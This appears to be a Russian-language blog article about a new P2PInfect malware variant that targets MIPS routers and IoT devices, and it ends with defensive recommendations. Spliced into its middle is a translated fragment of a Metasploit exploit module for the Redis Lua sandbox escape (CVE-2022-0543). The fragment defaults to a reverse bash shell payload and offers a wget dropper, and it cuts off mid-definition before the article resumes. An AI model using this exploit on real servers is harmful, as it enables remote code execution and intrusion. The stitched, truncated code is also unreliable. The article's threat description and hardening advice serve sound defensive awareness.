Введение
В последние годы, мир кибербезопасности столкнулся с растущим числом угроз, среди которых особое место занимают вредоносные программы, нацеленные на маршрутизаторы и устройства Интернета вещей (IoT). Один из таких малварей – P2PInfect, изначально атаковавший серверы Redis, теперь обновлен и адаптирован для атаки на широкий круг устройств. Этот новый вариант представляет собой серьезную угрозу для множества устройств с 32-битными процессорами MIPS, включая маршрутизаторы и IoT-устройства, что делает его анализ и понимание мер защиты чрезвычайно важными.
Описание нового варианта P2PInfect
Новый вариант малвари P2PInfect значительно расширил свои возможности, адаптируясь для атаки на устройства с 32-битными процессорами MIPS. Это особенно тревожно, учитывая широкое распространение таких процессоров в маршрутизаторах и IoT-устройствах. В отличие от предыдущих версий, нацеленных на серверы Redis, новый вариант обладает улучшенными механизмами уклонения от обнаружения и способен распространяться через SSH-серверы, используя слабые учетные данные. Зафиксированные атаки в Китае, США, Германии и других странах указывают на глобальный характер угрозы.
##
# Этот модуль требует Metasploit: <https://metasploit.com/download>
# Исходный код: <https://github.com/rapid7/metasploit-framework>
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Auxiliary::Redis
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Redis Lua Sandbox Escape',
'Description' => %q{
Этот модуль использует уязвимость CVE-2022-0543, основанную на сбое песочницы Lua в Redis.
Уязвимость была обнаружена в пакетах Redis для Debian и Ubuntu, где недостаточно очищалась среда Lua.
Пакеты позволяли загружать произвольные библиотеки.
В типичной установке Redis (не в контейнере) этот модуль выполняет код от имени пользователя Redis.
Пакеты Debian/Ubuntu запускают Redis с использованием systemd и разрешением "MemoryDenyWriteExecute",
что ограничивает возможности атакующего. Например, стейджированный Meterpreter завершится сбоем
при попытке использования mprotect. Поэтому предпочтительной полезной нагрузкой является стейджлесс Meterpreter.
Redis может быть настроен с аутентификацией или без нее. В рамках этой уязвимости модуль будет работать
с любой конфигурацией (при условии предоставления правильных данных аутентификации).
Теоретически уязвимость может быть эксплуатирована на нескольких архитектурах: i386, arm, ppc и т. д.,
но этот модуль поддерживает только x86_64, которая, вероятно, является самой популярной версией.
},
'License' => MSF_LICENSE,
'Author' => [
'Reginaldo Silva', # Обнаружение уязвимости и PoC
'jbaines-r7' # Модуль Metasploit
],
'References' => [
[ 'CVE', '2022-0543' ],
[ 'URL', '<https://www.lua.org/pil/8.2.html>'],
[ 'URL', '<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>' ],
[ 'URL', '<https://www.debian.org/security/2022/dsa-5081>' ],
[ 'URL', '<https://ubuntu.com/security/CVE-2022-0543>' ]
],
'DisclosureDate' => '2022-02-18',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'wget'],
'DefaultOptions'
Возможные угрозы и цели
Учитывая широкий спектр возможных применений нового варианта P2PInfect, основные опасения касаются нескольких типов кибератак. Среди них — добыча криптовалют, организация DDoS-атак, проксирование трафика и кража конфиденциальных данных. Эти угрозы особенно актуальны для корпоративных сетей и инфраструктуры, где маршрутизаторы и IoT-устройства играют ключевую роль. Неопределенность конечных целей злоумышленников усиливает необходимость комплексного подхода к кибербезопасности и мониторингу сетевой активности.
Меры предосторожности и защиты
С учетом серьезности угрозы, представляемой новым вариантом P2PInfect, необходимо принимать комплексные меры защиты. Для маршрутизаторов и IoT-устройств рекомендуется следующее:
- Регулярное обновление ПО: Убедитесь, что все устройства обновлены до последних версий прошивок и программного обеспечения, чтобы минимизировать уязвимости.
- Сильные учетные данные: Используйте сложные пароли и регулярно их обновляйте, особенно для SSH-доступа.
- Сетевой мониторинг: Непрерывный мониторинг сетевой активности поможет выявлять подозрительное поведение.
- Изоляция устройств: Где это возможно, изолируйте критически важные устройства от основной сети.
- Обучение и осведомленность персонала: Регулярное обучение персонала лучшим практикам кибербезопасности поможет снизить риски внедрения малвари.
